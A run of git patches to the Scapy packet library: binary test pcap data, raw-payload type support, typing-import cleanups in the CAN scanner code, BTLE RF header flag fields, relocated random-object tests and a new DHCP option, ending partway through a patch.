z@cIq)4~^k?{f7F7!X!NZUH@PQ_HVZ|c)p?Q&wVML&wOIPqjgy02FQCY!@Xd8r1ySb zFYx)}vmE!rI!%RdSwerv$E?7;NE`ocai zn$?gmOU1odGdWK_wWt8{Oz;x z!TV?AYTU~z;zzelI%N-e^%~rJ)b|d3S)K{Le>(X&?mcsl=U-u(Z$Q2v1NZVNv&yH~ zp00=dtuJt|c$1pexOi4N4VwS1f1ttZuU7-vzyJSFN&Nrs_0M9WH|F`XaQbMI{G*K% zO{zbkHr%9qR`@EDeA&>iO{%~A!ETfCcgB{O+4MP(ER@c_cQO{tRnyb Das=7U literal 0 HcmV?d00001 diff --git a/test/pcaps/doip.pcap.gz b/test/pcaps/doip.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..eb664db3048f868312fd4989a3be473267c6b3f8 GIT binary patch literal 2984 zcmV;Z3s>|XiwFoxx7}X=17vS$a4v9TVQ>Jonh8{t*A>U#3^2?9vI(+?aY2)~A?gT< zOGc3j>NG}6LrsIRK@*AEM%1WSK~s&Wsa0d6#tJncB8w3Y5hF;{=!r|jCC9iW#sznA zIk+Sir}thMmX9yD^?fbp3}+5!=Ks6@_wKvjd-w6}-ok(Cg`;TraTGfEZE9aO&dt?b zjE494veAzS3@@*mZWK{M47JXMzj|d3&UrecD(9)qW{xw*iO}=$`WljJH)L?^ucM;O z*0DXqL(RR+p}j4hwO_CM?E-|Nw+$TO&qT0jA-v_ndPpI{AX$PB5CSV5Il}uyh|ogF zS>(nM{z8O)vIJis^yNJ)Btl?;9N}+7=q^hb4utVnbsS*@5xQw14CXzoB0?8g!Ym*Zdl)&w8X|O(CCmoG zcZq@{tRq6OEFl#L?{;N#=^sRBCrg+Qgq2I!^{{~mZM6_Wy0IQIh|orsPymD%Je@c~ z77_fl5H5bk*4Atyw2~!k1;SX~!)7A*$`VR|u(~Bn$RmQ67D7f5J4*RP@RTL&K!P{x zp@0Y;vV;oErQxok7kn6BwSWH2h5UE&e2LHzH$4`w2vDDK2PrlmAb7?s*4J2YJ46ag zM!1Rr@E%{a-)$6QSL&API&m2t} zL_;d1Fk*JYGrL(dL#>4rO;D3)LN^rtwaSkP(lPJSwa;M+_PB^JBgszLKqXx zdMG7=PL^;72rj&bT}b%UCQEn(gvV`k&%SsT0Kpl*fC?kq>VA1Cce0k#;t6T8c)S)b z0tNih>FP7v(4lPHoTYBU4DZcq(L7%l&8;TUc&8^Hh)Q(lqS;H)bZHt*42-V@XRsj{;SXA8R+~f^ybn{0=Eb^bZZwI; z$23=8lZrZYE)4>e*EczEIklg1>XB?tAt4wZ4-DaJB0P{Kv;jh^9M;1DB2>!~IsqZ@ zx9r;fh6s0M3C{yzbTPZOj}YOG7Q!;#Lj@74WC>;$s)Ye0w{z!J_8;er;zsB`QneNTiRWeL9rf@6Qy!+9e7AWN7Agm;TgOz!WQ zhPmJOPxZMUZ;s3TAT>w?1TJTCAB9UkH;F;;evn%3hgvUE?z<{-|DZkhZGA|X9?waj zHr7WkhQj-yYGH=my^3MF2*nbO1;rB(=1F{z)jdEAw2~Z9bB(W_Tb-2{VRu`j2;|p zngO~4A=H;64wEJxI-D$?Fi$9X=DI;d!(XD+BqOZX$^Fj?$$Y!ywPp2Tx}fAJ2hmGc zod&u)3fWG{ElSyAvMGxMk1=ew=Qa_J$`Y2~gPHemhX_Yx2`hn6^+)!hcAp4`WC^Q) zu&Y!s3)@N$wY-Lh+8gG$gvuiiMZm#L%)&zjBve+IaGBpvQCa3F`*jjKgFjQ?du0Rv2ne0O zcVh~P^$N~lzOLyER+u38?dpXDHFJM(;|j?W8jRbD!PpMEemHpx<|qmYO76Sj#ubu( zk>pi{p<7Gn>*9s=@ug2DH}Nw()h7)Ai@{2gbhIW zB8%JCX&wD^AQU-q`#KtZuY09h2*uf~2aWSk4upzamf%E$5?R8RKu9vNqhuh$b}fXS zd8`K`5sGCA2Y?V@UW!a*Qhc*=TkC&E_g{v8n7E@!Jo zOCoI1LMRSptA-B|a%2gQfzXfl(25AzvIH9t68+ir5I}@XErfd|?0N_!!l$wX5e(-| zAJ#)_B5af;bO%DjdUhV#6Jfm;LJtd@OC5;ti7X)m2;4R-`m_fY9_T4oOd4z^jk%sr$F}*w#d@kE4-uR zlJyHrSWKngrQT|;?RZ&8L|Wu z5PW$L&k-SAmf#75_77Y9ACH$_K)CTLyM54jyhOsi$E=57BCL}ogaV;_o1S@W6KO**$zH z5k8b9Sb#8Q0_&kC5thjkqJiLcnC+@+>@6U{GMViRYwRt=03r4e>p^30Apr>EFF14m zo8?Xa_;Iv;Da|v-P5f)ZVIhKCnL>iX9U;ZP4zoeg%x0BQ`s8 z_Ftk{a}=@m2i+&Qb6lIGu#b|fw>Wc~Q42|KQb>%u#P literal 0 HcmV?d00001 From 2a8733aba89a0a1a7286d37c351b63a4dc1d4e81 Mon Sep 17 00:00:00 2001 From: Alex Forencich Date: Sat, 19 Dec 2020 19:24:30 -0800 Subject: [PATCH 0450/1632] Support bytearray and memoryview as raw payload --- scapy/packet.py | 14 +++++++------- test/regression.uts | 12 ++++++++++++ 2 files changed, 19 insertions(+), 7 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index a13a9c0b30e..7ded839edf6 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -356,10 +356,10 @@ def add_payload(self, payload): if t in payload.overload_fields: self.overloaded_fields = payload.overload_fields[t] break - elif isinstance(payload, bytes): - self.payload = conf.raw_layer(load=payload) + elif isinstance(payload, (bytes, str, bytearray, memoryview)): + self.payload = conf.raw_layer(load=bytes_encode(payload)) else: - raise TypeError("payload must be either 'Packet' or 'bytes', not [%s]" % repr(payload)) # noqa: E501 + raise TypeError("payload must be 'Packet', 'bytes', 'str', 'bytearray', or 'memoryview', not [%s]" % repr(payload)) # noqa: E501 def remove_payload(self): # type: () -> None @@ -577,16 +577,16 @@ def __div__(self, other): cloneB = other.copy() cloneA.add_payload(cloneB) return cloneA - elif isinstance(other, (bytes, str, bytearray)): - return self / conf.raw_layer(load=other) + elif isinstance(other, (bytes, str, bytearray, memoryview)): + return self / conf.raw_layer(load=bytes_encode(other)) else: return other.__rdiv__(self) # type: ignore __truediv__ = __div__ def __rdiv__(self, other): # type: (Any) -> Packet - if isinstance(other, (bytes, str, bytearray)): - return conf.raw_layer(load=other) / self + if isinstance(other, (bytes, str, bytearray, memoryview)): + return conf.raw_layer(load=bytes_encode(other)) / self else: raise TypeError __rtruediv__ = __rdiv__ diff --git a/test/regression.uts b/test/regression.uts index 3a627fb14ea..14fdeaccd59 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1000,6 +1000,18 @@ a=3 assert bytes(Raw("sca")/"py") == b"scapy" assert bytes(Raw("sca")/b"py") == b"scapy" assert bytes(Raw("sca")/bytearray(b"py")) == b"scapy" +assert bytes("sca"/Raw("py")) == b"scapy" +assert bytes(b"sca"/Raw("py")) == b"scapy" +assert bytes(bytearray(b"sca")/Raw("py")) == b"scapy" +a=Raw("sca") +a.add_payload("py") +assert bytes(a) == b"scapy" +a=Raw("sca") +a.add_payload(b"py") +assert bytes(a) == b"scapy" +a=Raw("sca") +a.add_payload(bytearray(b"py")) +assert bytes(a) == b"scapy" = Checking overloads ~ basic IP TCP Ether From 30341b89fa8474c53aea6f2af9685c3709945832 Mon Sep 17 00:00:00 2001 From: Andreas Korb Date: Wed, 16 Dec 2020 11:47:27 +0100 Subject: [PATCH 0451/1632] Doc: Fix range for ISOTPScan, second parameter is exclusive --- doc/scapy/layers/automotive.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index c28f5ce6681..50682782817 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -761,7 +761,7 @@ Interactive shell usage example:: >>> conf.contribs['CANSocket'] = {'use-python-can': False} >>> load_contrib('cansocket') >>> load_contrib('isotp') - >>> socks = ISOTPScan(CANSocket("vcan0"), range(0x700, 0x7ff), can_interface="vcan0") + >>> socks = ISOTPScan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") >>> socks [< at 0x7f98e27c8210>, < at 0x7f98f9079cd0>, From 0ce17d28ca48cfa460827a2965d06b229ea3eb1a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 23 Dec 2020 11:24:48 +0100 Subject: [PATCH 0452/1632] Remove imports of typing --- scapy/compat.py | 1 - scapy/contrib/automotive/xcp/scanner.py | 5 +++-- scapy/contrib/isotp.py | 14 +++++++------- scapy/layers/can.py | 3 ++- 4 files changed, 12 insertions(+), 11 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index 471652bc5df..5d5fc5a375a 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -36,7 +36,6 @@ 'Pattern', 'Sequence', 'Set', - 'Sequence', 'Sized', 'Tuple', 'Type', diff --git a/scapy/contrib/automotive/xcp/scanner.py b/scapy/contrib/automotive/xcp/scanner.py index c94efc8ac6c..777951fdb14 100644 --- a/scapy/contrib/automotive/xcp/scanner.py +++ b/scapy/contrib/automotive/xcp/scanner.py @@ -5,8 +5,9 @@ # scapy.contrib.description = XCPScanner # scapy.contrib.status = loads + from collections import namedtuple -from typing import Optional, List, Type, Iterable +from scapy.compat import Optional, List, Type, Iterator from scapy.config import conf from scapy.contrib.automotive.xcp.cto_commands_master import \ @@ -26,7 +27,7 @@ class XCPOnCANScanner: def __init__(self, can_socket, id_range=None, sniff_time=0.1, add_padding=False, verbose=False): - # type: (CANSocket, Optional[Iterable[int]], Optional[float], Optional[bool], Optional[bool]) -> None # noqa: E501 + # type: (CANSocket, Optional[Iterator[int]], Optional[float], Optional[bool], Optional[bool]) -> None # noqa: E501 """ Constructor diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index a57b3a70728..906530b806c 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -21,7 +21,7 @@ import traceback import heapq from threading import Thread, Event, Lock -from typing import Iterable, Optional, Union, List, Tuple, Dict +from scapy.compat import Iterator, Optional, Union, List, Tuple, Dict from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ @@ -1961,7 +1961,7 @@ def filter_periodic_packets(packet_dict, verbose=False): def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, verbose=False): # noqa: E501 - # type: (int, Union[List[int], Dict[int, Tuple[Packet, int]]], Optional[Iterable[int]], bool, Packet, bool) -> None # noqa: E501 + # type: (int, Union[List[int], Dict[int, Tuple[Packet, int]]], Optional[Iterator[int]], bool, Packet, bool) -> None # noqa: E501 """Callback for sniff function when packet received If received packet is a FlowControl and not in noise_ids append it @@ -2004,8 +2004,8 @@ def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, verbose=False): def scan(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterable[int] - noise_ids=None, # type: Optional[Iterable[int]] + scan_range=range(0x800), # type: Iterator[int] + noise_ids=None, # type: Optional[Iterator[int]] sniff_time=0.1, # type: float extended_can_id=False, # type: bool verbose=False # type: bool @@ -2052,10 +2052,10 @@ def scan(sock, # type: SuperSocket def scan_extended(sock, # type: SuperSocket - scan_range=range(0x800), # type: Iterable[int] + scan_range=range(0x800), # type: Iterator[int] scan_block_size=32, # type: int - extended_scan_range=range(0x100), # type: Iterable[int] - noise_ids=None, # type: Optional[Iterable[int]] # noqa: E501 + extended_scan_range=range(0x100), # type: Iterator[int] + noise_ids=None, # type: Optional[Iterator[int]] # noqa: E501 sniff_time=0.1, # type: float extended_can_id=False, # type: bool verbose=False # type: bool diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 093c590a0e5..ff0fbb17a31 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -14,7 +14,8 @@ import struct import binascii -from typing import Tuple, Optional, Type, List, Union, Callable, IO, Any, cast +from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ + Any, cast import scapy.modules.six as six from scapy.config import conf From 27545d884aaf6fd34274107ae7bd870fb8a4eed7 Mon Sep 17 00:00:00 2001 From: Rubin Gerritsen Date: Tue, 22 Dec 2020 10:10:46 +0100 Subject: [PATCH 0453/1632] btle-rf: rfu flags are now defined These flags are used to provide more context for the current PDU. Wireshark can use this to determine the direction of the PDU, the location in an advertising chain etc. Signed-off-by: Rubin Gerritsen --- scapy/layers/bluetooth4LE.py | 44 ++++++++++++++++++++++++------ test/scapy/layers/bluetooth4LE.uts | 10 +++++-- 2 files changed, 42 insertions(+), 12 deletions(-) diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index 82cee336037..cf51905f01d 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -14,9 +14,10 @@ PPI_BTLE from scapy.packet import Packet, bind_layers from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - Field, FlagsField, LEIntField, LEShortEnumField, LEShortField, \ + Field, LEIntField, LEShortEnumField, LEShortField, \ MACField, PacketListField, SignedByteField, X3BytesField, XBitField, \ XByteField, XIntField, XShortField, XLEIntField, XLEShortField +from scapy.contrib.ethercat import LEBitEnumField, LEBitField from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr from scapy.layers.ppi import PPI_Element, PPI_Hdr @@ -53,22 +54,47 @@ class BTLE_PPI(PPI_Element): class BTLE_RF(Packet): """Cooked BTLE link-layer pseudoheader. - http://www.whiterocker.com/bt/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html + https://www.tcpdump.org/linktypes/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html """ name = "BTLE RF info header" + + _TYPES = { + 0: "ADV_OR_DATA_UNKNOWN_DIR", + 1: "AUX_ADV", + 2: "DATA_M_TO_S", + 3: "DATA_S_TO_M", + 4: "CONN_ISO_M_TO_S", + 5: "CONN_ISO_S_TO_M", + 6: "BROADCAST_ISO", + 7: "RFU", + } + + _PHY = { + 0: "1M", + 1: "2M", + 2: "Coded", + 3: "RFU", + } + fields_desc = [ ByteField("rf_channel", 0), SignedByteField("signal", -128), SignedByteField("noise", -128), ByteField("access_address_offenses", 0), XLEIntField("reference_access_address", 0), - FlagsField("flags", 0, -16, [ - "dewhitened", "sig_power_valid", "noise_power_valid", - "decrypted", "reference_access_address_valid", - "access_address_offenses_valid", "channel_aliased", - "res1", "res2", "res3", "crc_checked", "crc_valid", - "mic_checked", "mic_valid", "res4", "res5" - ]) + LEBitField("dewhitened", 0, 1), + LEBitField("sig_power_valid", 0, 1), + LEBitField("noise_power_valid", 0, 1), + LEBitField("decrypted", 0, 1), + LEBitField("reference_access_address_valid", 0, 1), + LEBitField("access_address_offenses_valid", 0, 1), + LEBitField("channel_aliased", 0, 1), + LEBitEnumField("type", 0, 3, _TYPES), + LEBitField("crc_checked", 0, 1), + LEBitField("crc_valid", 0, 1), + LEBitField("mic_checked", 0, 1), + LEBitField("mic_valid", 0, 1), + LEBitEnumField("phy", 0, 2, _PHY), ] diff --git a/test/scapy/layers/bluetooth4LE.uts b/test/scapy/layers/bluetooth4LE.uts index 6a358975dfc..8a9a2b80932 100644 --- a/test/scapy/layers/bluetooth4LE.uts +++ b/test/scapy/layers/bluetooth4LE.uts @@ -65,19 +65,23 @@ assert BTLE_SCAN_RSP in pkt.layers() a = BTLE_RF()/BTLE()/BTLE_ADV()/BTLE_SCAN_REQ() a.ScanA = "aa:aa:aa:aa:aa:aa" a.AdvA = "bb:bb:bb:bb:bb:bb" -a.flags = 0x10 +a.reference_access_address_valid = 1 a.reference_access_address = 0x8e89bed6 +a.phy = 3 +a.type = 5 a.noise = -90 a.signal = -75 a.rf_channel = 6 a.access_address_offenses = 10 -assert raw(a) == b'\x06\xb5\xa6\n\xd6\xbe\x89\x8e\x10\x00\xd6\xbe\x89\x8e\x03\x0c\xaa\xaa\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xbb\xbb\x07\xb2a' +assert raw(a) == b'\x06\xb5\xa6\n\xd6\xbe\x89\x8e\x90\xc2\xd6\xbe\x89\x8e\x03\x0c\xaa\xaa\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xbb\xbb\x07\xb2a' a = BTLE_RF(raw(a)) assert a.noise == -90 assert a.signal == -75 -assert a.flags == "reference_access_address_valid" +assert a.phy == 3 +assert a.type == 5 +assert a.reference_access_address_valid == 1 assert a[BTLE_SCAN_REQ].ScanA == "aa:aa:aa:aa:aa:aa" + Specific tests after issue GH#1673 From af0ff0dc900c8c6d9921667a1181a4d37909d7a5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 26 Oct 2020 08:49:39 +0100 Subject: [PATCH 0454/1632] Standalon random objects unit tests Co-authored-by: Gabriel Potter Co-authored-by: Pierre Lalet Co-authored-by: Guillaume Valadon Co-authored-by: Michael Farrell Co-authored-by: Thomas Faivre --- test/random.uts | 136 ++++++++++++++++++++++++++++++++++++++++++++ test/regression.uts | 135 ------------------------------------------- 2 files changed, 136 insertions(+), 135 deletions(-) create mode 100644 test/random.uts diff --git a/test/random.uts b/test/random.uts new file mode 100644 index 00000000000..29577e9d147 --- /dev/null +++ b/test/random.uts @@ -0,0 +1,136 @@ +% Regression tests for Scapy random objects + +############ +############ ++ Random objects + += RandomEnumeration + +ren = RandomEnumeration(0, 7, seed=0x2807, forever=False) +[x for x in ren] == ([3, 4, 2, 5, 1, 6, 0, 7] if six.PY2 else [5, 0, 2, 7, 6, 3, 1, 4]) + += RandIP6 + +random.seed(0x2807) +r6 = RandIP6() +assert(r6 == ("d279:1205:e445:5a9f:db28:efc9:afd7:f594" if six.PY2 else + "240b:238f:b53f:b727:d0f9:bfc4:2007:e265")) +assert(r6.command() == "RandIP6()") + +random.seed(0x2807) +r6 = RandIP6("2001:db8::-") +assert(r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f")) +assert(r6.command() == "RandIP6(ip6template='2001:db8::-')") + +r6 = RandIP6("2001:db8::*") +assert(r6 == ("2001:0db8::efc9" if six.PY2 else "2001:0db8::bfc4")) +assert(r6.command() == "RandIP6(ip6template='2001:db8::*')") + += RandMAC + +random.seed(0x2807) +rm = RandMAC() +assert(rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf")) +assert(rm.command() == "RandMAC()") + +rm = RandMAC("00:01:02:03:04:0-7") +assert(rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01")) +assert(rm.command() == "RandMAC(template='00:01:02:03:04:0-7')") + + += RandOID + +random.seed(0x2807) +ro = RandOID() +assert(ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18") +assert(ro.command() == "RandOID()") + +ro = RandOID("1.2.3.*") +assert(ro == "1.2.3.41") +assert(ro.command() == "RandOID(fmt='1.2.3.*')") + +ro = RandOID("1.2.3.0-28") +assert(ro == ("1.2.3.11" if six.PY2 else "1.2.3.12")) +assert(ro.command() == "RandOID(fmt='1.2.3.0-28')") + +ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) +assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))") + += RandRegExp +~ not_pyannotate + +random.seed(0x2807) +rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") +bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') +assert(rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')") + +rex = RandRegExp("[:digit:][:space:][:word:]") +assert re.match(b"\\d\\s\\w", bytes(rex)) + += Corrupted(Bytes|Bits) + +random.seed(0x2807) +cb = CorruptedBytes("ABCDE", p=0.5) +assert(cb.command() == "CorruptedBytes(s='ABCDE', p=0.5)") +assert(sane(raw(cb)) in [".BCD)", "&BCDW"]) + +cb = CorruptedBits("ABCDE", p=0.2) +assert(cb.command() == "CorruptedBits(s='ABCDE', p=0.2)") +assert(sane(raw(cb)) in ["ECk@Y", "QB.P."]) + += RandEnumKeys +random.seed(0x2807) +rek = RandEnumKeys({'a': 1, 'b': 2, 'c': 3}, seed=0x2807) +rek.enum.sort() +assert(rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)") +r = str(rek) +assert(r == ('c' if six.PY2 else 'a')) + += RandSingNum +random.seed(0x2807) +rs = RandSingNum(-28, 7) +assert(rs._fix() in [2, 3]) +assert(rs.command() == "RandSingNum(mn=-28, mx=7)") + += Rand* +random.seed(0x2807) +rss = RandSingString() +assert(rss == ("CON:" if six.PY2 else "foo.exe:")) +assert(rss.command() == "RandSingString()") + +random.seed(0x2807) +rts = RandTermString(4, "scapy") +assert(sane(raw(rts)) in ["...Zscapy", "$#..scapy"]) +assert(rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b') + += RandInt (test __bool__) +a = "True" if RandNum(False, True) else "False" +assert a in ["True", "False"] + += Various volatiles + +random.seed(0x2807) +rng = RandNumGamma(1, 42) +assert rng._fix() in (8, 73) +assert rng.command() == "RandNumGamma(alpha=1, beta=42)" + +random.seed(0x2807) +rng = RandNumGauss(1, 42) +assert rng._fix() == 8 +assert rng.command() == "RandNumGauss(mu=1, sigma=42)" + +renum = RandEnum(1, 42, seed=0x2807) +assert renum == (13 if six.PY2 else 37) +assert renum.command() == "RandEnum(min=1, max=42, seed=10247)" + +rp = RandPool((IncrementalValue(), 42), (IncrementalValue(), 0)) +assert rp == 0 +assert rp.command() == "RandPool((IncrementalValue(), 42), (IncrementalValue(), 0))" + +de = DelayedEval("3 + 1") +assert de == 4 +assert de.command() == "DelayedEval(expr='3 + 1')" + +v = IncrementalValue(restart=2) +assert v == 0 and v == 1 and v == 2 and v == 0 +assert v.command() == "IncrementalValue(restart=2)" \ No newline at end of file diff --git a/test/regression.uts b/test/regression.uts index 14fdeaccd59..6c59cb832c6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4081,141 +4081,6 @@ conf.route.routes = [ assert sorted(conf.route.get_if_bcast(dummy_interface)) == sorted(['169.254.255.255', '172.21.230.255', '239.255.255.255']) conf.route.routes = bck_conf_route_routes -############ -############ -+ Random objects - -= RandomEnumeration - -ren = RandomEnumeration(0, 7, seed=0x2807, forever=False) -[x for x in ren] == ([3, 4, 2, 5, 1, 6, 0, 7] if six.PY2 else [5, 0, 2, 7, 6, 3, 1, 4]) - -= RandIP6 - -random.seed(0x2807) -r6 = RandIP6() -assert(r6 == ("d279:1205:e445:5a9f:db28:efc9:afd7:f594" if six.PY2 else - "240b:238f:b53f:b727:d0f9:bfc4:2007:e265")) -assert(r6.command() == "RandIP6()") - -random.seed(0x2807) -r6 = RandIP6("2001:db8::-") -assert(r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f")) -assert(r6.command() == "RandIP6(ip6template='2001:db8::-')") - -r6 = RandIP6("2001:db8::*") -assert(r6 == ("2001:0db8::efc9" if six.PY2 else "2001:0db8::bfc4")) -assert(r6.command() == "RandIP6(ip6template='2001:db8::*')") - -= RandMAC - -random.seed(0x2807) -rm = RandMAC() -assert(rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf")) -assert(rm.command() == "RandMAC()") - -rm = RandMAC("00:01:02:03:04:0-7") -assert(rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01")) -assert(rm.command() == "RandMAC(template='00:01:02:03:04:0-7')") - - -= RandOID - -random.seed(0x2807) -ro = RandOID() -assert(ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18") -assert(ro.command() == "RandOID()") - -ro = RandOID("1.2.3.*") -assert(ro == "1.2.3.41") -assert(ro.command() == "RandOID(fmt='1.2.3.*')") - -ro = RandOID("1.2.3.0-28") -assert(ro == ("1.2.3.11" if six.PY2 else "1.2.3.12")) -assert(ro.command() == "RandOID(fmt='1.2.3.0-28')") - -ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) -assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))") - -= RandRegExp -~ not_pyannotate - -random.seed(0x2807) -rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") -bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') -assert(rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')") - -rex = RandRegExp("[:digit:][:space:][:word:]") -assert re.match(b"\\d\\s\\w", bytes(rex)) - -= Corrupted(Bytes|Bits) - -random.seed(0x2807) -cb = CorruptedBytes("ABCDE", p=0.5) -assert(cb.command() == "CorruptedBytes(s='ABCDE', p=0.5)") -assert(sane(raw(cb)) in [".BCD)", "&BCDW"]) - -cb = CorruptedBits("ABCDE", p=0.2) -assert(cb.command() == "CorruptedBits(s='ABCDE', p=0.2)") -assert(sane(raw(cb)) in ["ECk@Y", "QB.P."]) - -= RandEnumKeys -random.seed(0x2807) -rek = RandEnumKeys({'a': 1, 'b': 2, 'c': 3}, seed=0x2807) -rek.enum.sort() -assert(rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)") -r = str(rek) -assert(r == ('c' if six.PY2 else 'a')) - -= RandSingNum -random.seed(0x2807) -rs = RandSingNum(-28, 7) -assert(rs._fix() in [2, 3]) -assert(rs.command() == "RandSingNum(mn=-28, mx=7)") - -= Rand* -random.seed(0x2807) -rss = RandSingString() -assert(rss == ("CON:" if six.PY2 else "foo.exe:")) -assert(rss.command() == "RandSingString()") - -random.seed(0x2807) -rts = RandTermString(4, "scapy") -assert(sane(raw(rts)) in ["...Zscapy", "$#..scapy"]) -assert(rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b') - -= RandInt (test __bool__) -a = "True" if RandNum(False, True) else "False" -assert a in ["True", "False"] - -= Various volatiles - -random.seed(0x2807) -rng = RandNumGamma(1, 42) -assert rng._fix() in (8, 73) -assert rng.command() == "RandNumGamma(alpha=1, beta=42)" - -random.seed(0x2807) -rng = RandNumGauss(1, 42) -assert rng._fix() == 8 -assert rng.command() == "RandNumGauss(mu=1, sigma=42)" - -renum = RandEnum(1, 42, seed=0x2807) -assert renum == (13 if six.PY2 else 37) -assert renum.command() == "RandEnum(min=1, max=42, seed=10247)" - -rp = RandPool((IncrementalValue(), 42), (IncrementalValue(), 0)) -assert rp == 0 -assert rp.command() == "RandPool((IncrementalValue(), 42), (IncrementalValue(), 0))" - -de = DelayedEval("3 + 1") -assert de == 4 -assert de.command() == "DelayedEval(expr='3 + 1')" - -v = IncrementalValue(restart=2) -assert v == 0 and v == 1 and v == 2 and v == 0 -assert v.command() == "IncrementalValue(restart=2)" - ############ ############ From 6ee1ff0077eb633d924238641514c0ba8a64f903 Mon Sep 17 00:00:00 2001 From: Michal Nowikowski Date: Thu, 17 Dec 2020 11:45:08 +0100 Subject: [PATCH 0455/1632] [#3020] added support for DHCPv4 option 77 --- scapy/layers/dhcp.py | 1 + test/scapy/layers/dhcp.uts | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 52053908443..4164d88e6c8 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -186,6 +186,7 @@ def getfield(self, pkt, s): 74: IPField("IRC_server", "0.0.0.0"), 75: IPField("StreetTalk_server", "0.0.0.0"), 76: IPField("StreetTalk_Dir_Assistance", "0.0.0.0"), + 77: "user_class", 78: "slp_service_agent", 79: "slp_service_scope", 81: "client_FQDN", diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index d196885074d..032f0ee310e 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -10,7 +10,7 @@ assert BOOTP().hashret() == b"\x00\x00\x00\x00" import random random.seed(0x2809) -assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_ttl', 229)]"] +assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]"] = DHCPOptionsField From c092c83dcaed9068575ccc592f829f42a5b2890b Mon Sep 17 00:00:00 2001 From: Michal Nowikowski Date: Tue, 22 Dec 2020 16:10:59 +0100 Subject: [PATCH 0456/1632] fixed unit test for RandDHCPOptions --- test/scapy/layers/dhcp.uts | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 032f0ee310e..d20a2b03517 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -10,7 +10,9 @@ assert BOOTP().hashret() == b"\x00\x00\x00\x00" import random random.seed(0x2809) -assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]"] +o = str(RandDHCPOptions(size=1)) +print("RandDHCPOptions %s" % o) +assert o in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_keepalive_interval', 3853054080)]"] = DHCPOptionsField From fa6322939b668b3cf6baf57a6720fa2920faf698 Mon Sep 17 00:00:00 2001 From: Michal Nowikowski Date: Tue, 22 Dec 2020 16:45:47 +0100 Subject: [PATCH 0457/1632] commented out trace of RandDHCPOptions --- test/scapy/layers/dhcp.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/scapy/layers/dhcp.uts 